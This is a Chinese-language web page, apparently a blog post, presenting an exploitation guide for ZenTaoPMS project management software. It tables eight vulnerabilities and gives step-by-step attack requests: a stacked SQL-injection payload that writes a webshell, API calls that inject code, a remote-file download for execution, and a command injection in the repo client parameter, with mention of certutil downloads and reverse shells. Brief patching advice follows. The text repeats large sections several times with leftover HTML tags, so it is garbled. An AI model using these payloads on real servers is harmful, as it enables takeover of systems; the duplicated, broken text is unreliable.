禅道项目管理系统(ZenTaoPMS)高危漏洞分析与利用指南<\/h1>

一、禅道项目管理系统简介<\/h2>

1.1 基本信息<\/h3>
ZenTaoPMS（禅道项目管理软件）是易软天创公司开发的项目管理软件，基于国际流行的敏捷项目管理方式Scrum，并融入了bug管理、测试用例管理、发布管理、文档管理等国内研发需求。<\/p>

1.2 版本系列<\/h3>

开源版<\/strong>（2009-2020）：基础版本，仅包含项目管理基本模块<\/li>
专业版<\/strong>（2012-2020）：开源版基础上增加增强功能<\/li>
企业版<\/strong>（2017-2020）：专业版基础上增加运维管理、OA办公管理等功能<\/li>

集团版<\/strong>（2019-2020）：主站平台+子站点架构，子站点基于企业版<\/li> <\/ul>
1.3 使用情况<\/h3>

全网使用量超过4万个网站<\/li>
75%以上用户位于中国<\/li>
主要分布在广东、浙江、北京、上海<\/li> <\/ul>
二、高危漏洞列表<\/h2>

漏洞名称<\/th> 影响版本<\/th> 披露日期<\/th> 漏洞类型<\/th> <\/tr> <\/thead>

禅道8.2-9.2.1 SQL注入导致前台Getshell<\/td> 禅道开源版8.2-9.2.1<\/td> 2018<\/td> SQL注入<\/td> <\/tr>
禅道后台代码注入漏洞<\/td> 禅道开源版<=11.6<\/td> 2019<\/td> 代码注入<\/td> <\/tr>
禅道后台任意文件删除漏洞<\/td> 禅道开源版<=11.6<\/td> 2019<\/td> 文件删除<\/td> <\/tr>
禅道后台任意文件读取漏洞<\/td> 禅道开源版<=11.6<\/td> 2019<\/td> 文件读取<\/td> <\/tr>
禅道后台文件包含漏洞<\/td> 禅道开源版<=11.6<\/td> 2019<\/td> 文件包含<\/td> <\/tr>
禅道后台SQL注入漏洞<\/td> 禅道开源版<=11.6<\/td> 2019<\/td> SQL注入<\/td> <\/tr>
禅道任意文件上传漏洞<\/td> 10.x < 禅道开源版 <12.4.3<\/td> 2020<\/td> 文件上传<\/td> <\/tr>
禅道Pro 8.8.2命令注入漏洞<\/td> 禅道Pro<=8.8.2<\/td> 2020<\/td> 命令注入<\/td> <\/tr> <\/tbody> <\/table>
三、漏洞利用链分析<\/h2>
3.1 无需权限利用链<\/h3>
ZenTaoPMS (8.2-9.2.1) - GetShell<\/strong><\/p>

影响版本：8.2-9.2.1<\/li>
漏洞类型：SQL注入<\/li>
利用条件：系统有文件写入权限<\/li>
检测方法：访问\/zentao\/index.php?mode=getconfig<\/code>获取版本信息<\/li> <\/ul> 3.2 低权限利用链<\/h3> ZenTaoPMS <11.6 - GetShell<\/strong><\/p> 需要后台用户账号或cookie<\/li> 通过代码注入生成shell<\/li> <\/ul> 3.3 管理员权限利用链<\/h3> ZenTaoPMS <12.4.3 - GetShell<\/strong><\/p> 仅适用于Windows\/Linux一键安装版(未加安全限制)和安装包版<\/li> 需要管理员账号或cookie<\/li> <\/ul> <\/li> ZenTaoPMS Pro<=8.8.2 - GetShell<\/strong><\/p> 命令执行无回显<\/li> 可通过certutil.exe下载远程恶意软件<\/li> <\/ul> <\/li> <\/ol> 四、技术背景：禅道路由模式<\/h2> 禅道有两种路由模式：<\/p> PATH_INFO模式<\/strong>（默认）：<\/p> 示例：user-login-L3plbnRhb3BtczEwLjMuMS93d3cv.html<\/code><\/li> 分隔符为"-"，第一部分为模块名，第二部分为方法名<\/li> <\/ul> <\/li> GET模式<\/strong>：<\/p> 示例：index.php?m=block&f=main&mode=getblockdata<\/code><\/li> m参数为模块名，f参数为方法名<\/li> <\/ul> <\/li> <\/ol> 路由解析流程：<\/p> $app->parseRequest()<\/code> - 解析请求<\/li> $common->checkPriv()<\/code> - 检查权限<\/li> $app->loadModule()<\/code> - 加载模块<\/li> <\/ol> 五、重点漏洞详细分析<\/h2> 5.1 禅道8.2-9.2.1 SQL注入漏洞<\/h3> 漏洞原理<\/h4> 位于module\/block\/control.php<\/code>中的printCaseBlock()<\/code>函数<\/li> orderby<\/code>参数未过滤直接拼接SQL语句<\/li> 可构造limit<\/code>部分闭合SQL语句并执行恶意代码<\/li> <\/ul> 利用步骤：<\/h4> 构造SQL注入语句写入木马<\/li> 将EXP进行ASCIIhex加密<\/li> 构造payload： {"orderBy"<\/span>:"order limit 1;SET @SQL=0x(加密后字符串);PREPARE pord FROM @SQL;EXECUTE pord;-- -"<\/span>,"num"<\/span>:"1,1"<\/span>,"type"<\/span>:"openedbyme"<\/span>} <\/span><\/span><\/code><\/pre><\/li> 对payload进行base64编码<\/li> 访问： http:\/\/target\/zentao\/index.php?m=block&f=main&mode=getblockdata&blockid=case&param=base64编码字符串 <\/code><\/pre> <\/li> <\/ol> 5.2 禅道后台代码注入漏洞<\/h3> 漏洞原理<\/h4> 通过module\/api\/control.php<\/code>中的getModel<\/code>方法越权调用其他模块<\/li> 可调用editor<\/code>模块的save<\/code>方法写入文件<\/li> 再通过文件包含执行写入的代码<\/li> <\/ul> 利用步骤：<\/h4> 登录获取cookie<\/li> 访问生成shell： api-getModel-editor-save-filePath <\/code><\/pre> <\/li> 包含执行shell： api-getModel-api-getMethod-filePath= <\/code><\/pre> <\/li> <\/ol> 5.3 禅道后台文件上传漏洞<\/h3> 漏洞原理<\/h4> 位于module\/client\/model.php<\/code>中的downloadZipPackage<\/code>函数<\/li> link<\/code>参数可使用HTTP\/FTP\/file等协议<\/li> 可下载远程文件到服务器<\/li> <\/ul> 利用步骤：<\/h4> 登录获取cookie<\/li> 访问下载远程文件： client-download-[version]-[base64编码的恶意文件地址]-1.html <\/code><\/pre> <\/li> 访问下载的文件执行： data\/cliten\/1\/[文件] <\/code><\/pre> <\/li> <\/ol> 5.4 禅道Pro命令注入漏洞<\/h3> 漏洞原理<\/h4> 位于module\/repo\/model.php<\/code>中的checkConnection<\/code>函数<\/li> client<\/code>参数未过滤直接拼接执行命令<\/li> <\/ul> 利用步骤：<\/h4> 管理员登录<\/li> 通过\/repo-create.html<\/code>页面的client<\/code>参数执行命令： SCM=Git&name=test2&path=C%3A%5CProgramData&encoding=utf-8&client=[命令] <\/code><\/pre> <\/li> 可下载恶意软件或反弹shell<\/li> <\/ol> 六、修复建议<\/h2> 升级到最新版本<\/strong>：<\/p> 开源版：升级至12.4.3或更高<\/li> Pro版：升级至8.8.2或更高<\/li> <\/ul> <\/li> 临时缓解措施<\/strong>：<\/p> 限制后台访问IP<\/li> 加强文件上传和命令执行过滤<\/li> 关闭不必要的模块和接口<\/li> <\/ul> <\/li> 安全配置<\/strong>：<\/p> 修改默认路由分隔符<\/li> 加强权限验证机制<\/li> 定期安全审计<\/li> <\/ul> <\/li> <\/ol> 七、总结<\/h2> 禅道项目管理系统的漏洞主要集中在：<\/p> SQL注入导致的前台Getshell<\/li> 后台越权调用导致的代码注入<\/li> 文件上传和命令注入漏洞<\/li> <\/ol> 这些漏洞大多需要一定权限，但危害严重，可导致服务器完全沦陷。建议用户及时升级并加强安全配置。<\/p>

漏洞名称<\/th>	影响版本<\/th>	披露日期<\/th>	漏洞类型<\/th> <\/tr> <\/thead>
禅道8.2-9.2.1 SQL注入导致前台Getshell<\/td>	禅道开源版8.2-9.2.1<\/td>	2018<\/td>	SQL注入<\/td> <\/tr>
禅道后台代码注入漏洞<\/td>	禅道开源版<=11.6<\/td>	2019<\/td>	代码注入<\/td> <\/tr>
禅道后台任意文件删除漏洞<\/td>	禅道开源版<=11.6<\/td>	2019<\/td>	文件删除<\/td> <\/tr>
禅道后台任意文件读取漏洞<\/td>	禅道开源版<=11.6<\/td>	2019<\/td>	文件读取<\/td> <\/tr>
禅道后台文件包含漏洞<\/td>	禅道开源版<=11.6<\/td>	2019<\/td>	文件包含<\/td> <\/tr>
禅道后台SQL注入漏洞<\/td>	禅道开源版<=11.6<\/td>	2019<\/td>	SQL注入<\/td> <\/tr>
禅道任意文件上传漏洞<\/td>	10.x < 禅道开源版 <12.4.3<\/td>	2020<\/td>	文件上传<\/td> <\/tr>
禅道Pro 8.8.2命令注入漏洞<\/td>	禅道Pro<=8.8.2<\/td>	2020<\/td>	命令注入<\/td> <\/tr> <\/tbody> <\/table> 三、漏洞利用链分析<\/h2> 3.1 无需权限利用链<\/h3> ZenTaoPMS (8.2-9.2.1) - GetShell<\/strong><\/p> 影响版本：8.2-9.2.1<\/li> 漏洞类型：SQL注入<\/li> 利用条件：系统有文件写入权限<\/li> 检测方法：访问\/zentao\/index.php?mode=getconfig<\/code>获取版本信息<\/li> <\/ul> 3.2 低权限利用链<\/h3> ZenTaoPMS <11.6 - GetShell<\/strong><\/p> 需要后台用户账号或cookie<\/li> 通过代码注入生成shell<\/li> <\/ul> 3.3 管理员权限利用链<\/h3> ZenTaoPMS <12.4.3 - GetShell<\/strong><\/p> 仅适用于Windows\/Linux一键安装版(未加安全限制)和安装包版<\/li> 需要管理员账号或cookie<\/li> <\/ul> <\/li> ZenTaoPMS Pro<=8.8.2 - GetShell<\/strong><\/p> 命令执行无回显<\/li> 可通过certutil.exe下载远程恶意软件<\/li> <\/ul> <\/li> <\/ol> 四、技术背景：禅道路由模式<\/h2> 禅道有两种路由模式：<\/p> PATH_INFO模式<\/strong>（默认）：<\/p> 示例：user-login-L3plbnRhb3BtczEwLjMuMS93d3cv.html<\/code><\/li> 分隔符为"-"，第一部分为模块名，第二部分为方法名<\/li> <\/ul> <\/li> GET模式<\/strong>：<\/p> 示例：index.php?m=block&f=main&mode=getblockdata<\/code><\/li> m参数为模块名，f参数为方法名<\/li> <\/ul> <\/li> <\/ol> 路由解析流程：<\/p> $app->parseRequest()<\/code> - 解析请求<\/li> $common->checkPriv()<\/code> - 检查权限<\/li> $app->loadModule()<\/code> - 加载模块<\/li> <\/ol> 五、重点漏洞详细分析<\/h2> 5.1 禅道8.2-9.2.1 SQL注入漏洞<\/h3> 漏洞原理<\/h4> 位于module\/block\/control.php<\/code>中的printCaseBlock()<\/code>函数<\/li> orderby<\/code>参数未过滤直接拼接SQL语句<\/li> 可构造limit<\/code>部分闭合SQL语句并执行恶意代码<\/li> <\/ul> 利用步骤：<\/h4> 构造SQL注入语句写入木马<\/li> 将EXP进行ASCIIhex加密<\/li> 构造payload： {"orderBy"<\/span>:"order limit 1;SET @SQL=0x(加密后字符串);PREPARE pord FROM @SQL;EXECUTE pord;-- -"<\/span>,"num"<\/span>:"1,1"<\/span>,"type"<\/span>:"openedbyme"<\/span>} <\/span><\/span><\/code><\/pre><\/li> 对payload进行base64编码<\/li> 访问： http:\/\/target\/zentao\/index.php?m=block&f=main&mode=getblockdata&blockid=case&param=base64编码字符串 <\/code><\/pre> <\/li> <\/ol> 5.2 禅道后台代码注入漏洞<\/h3> 漏洞原理<\/h4> 通过module\/api\/control.php<\/code>中的getModel<\/code>方法越权调用其他模块<\/li> 可调用editor<\/code>模块的save<\/code>方法写入文件<\/li> 再通过文件包含执行写入的代码<\/li> <\/ul> 利用步骤：<\/h4> 登录获取cookie<\/li> 访问生成shell： api-getModel-editor-save-filePath <\/code><\/pre> <\/li> 包含执行shell： api-getModel-api-getMethod-filePath= <\/code><\/pre> <\/li> <\/ol> 5.3 禅道后台文件上传漏洞<\/h3> 漏洞原理<\/h4> 位于module\/client\/model.php<\/code>中的downloadZipPackage<\/code>函数<\/li> link<\/code>参数可使用HTTP\/FTP\/file等协议<\/li> 可下载远程文件到服务器<\/li> <\/ul> 利用步骤：<\/h4> 登录获取cookie<\/li> 访问下载远程文件： client-download-[version]-[base64编码的恶意文件地址]-1.html <\/code><\/pre> <\/li> 访问下载的文件执行： data\/cliten\/1\/[文件] <\/code><\/pre> <\/li> <\/ol> 5.4 禅道Pro命令注入漏洞<\/h3> 漏洞原理<\/h4> 位于module\/repo\/model.php<\/code>中的checkConnection<\/code>函数<\/li> client<\/code>参数未过滤直接拼接执行命令<\/li> <\/ul> 利用步骤：<\/h4> 管理员登录<\/li> 通过\/repo-create.html<\/code>页面的client<\/code>参数执行命令： SCM=Git&name=test2&path=C%3A%5CProgramData&encoding=utf-8&client=[命令] <\/code><\/pre> <\/li> 可下载恶意软件或反弹shell<\/li> <\/ol> 六、修复建议<\/h2> 升级到最新版本<\/strong>：<\/p> 开源版：升级至12.4.3或更高<\/li> Pro版：升级至8.8.2或更高<\/li> <\/ul> <\/li> 临时缓解措施<\/strong>：<\/p> 限制后台访问IP<\/li> 加强文件上传和命令执行过滤<\/li> 关闭不必要的模块和接口<\/li> <\/ul> <\/li> 安全配置<\/strong>：<\/p> 修改默认路由分隔符<\/li> 加强权限验证机制<\/li> 定期安全审计<\/li> <\/ul> <\/li> <\/ol> 七、总结<\/h2> 禅道项目管理系统的漏洞主要集中在：<\/p> SQL注入导致的前台Getshell<\/li> 后台越权调用导致的代码注入<\/li> 文件上传和命令注入漏洞<\/li> <\/ol> 这些漏洞大多需要一定权限，但危害严重，可导致服务器完全沦陷。建议用户及时升级并加强安全配置。<\/p>

禅道项目管理系统(ZenTaoPMS)高危漏洞分析与利用指南<\/h1>

一、禅道项目管理系统简介<\/h2>

1.1 基本信息<\/h3> ZenTaoPMS（禅道项目管理软件）是易软天创公司开发的项目管理软件，基于国际流行的敏捷项目管理方式Scrum，并融入了bug管理、测试用例管理、发布管理、文档管理等国内研发需求。<\/p>

三、漏洞利用链分析<\/h2>

五、重点漏洞详细分析<\/h2>

5.1 禅道8.2-9.2.1 SQL注入漏洞<\/h3>

5.2 禅道后台代码注入漏洞<\/h3>

5.3 禅道后台文件上传漏洞<\/h3>

5.4 禅道Pro命令注入漏洞<\/h3>

1.1 基本信息<\/h3>
ZenTaoPMS（禅道项目管理软件）是易软天创公司开发的项目管理软件，基于国际流行的敏捷项目管理方式Scrum，并融入了bug管理、测试用例管理、发布管理、文档管理等国内研发需求。<\/p>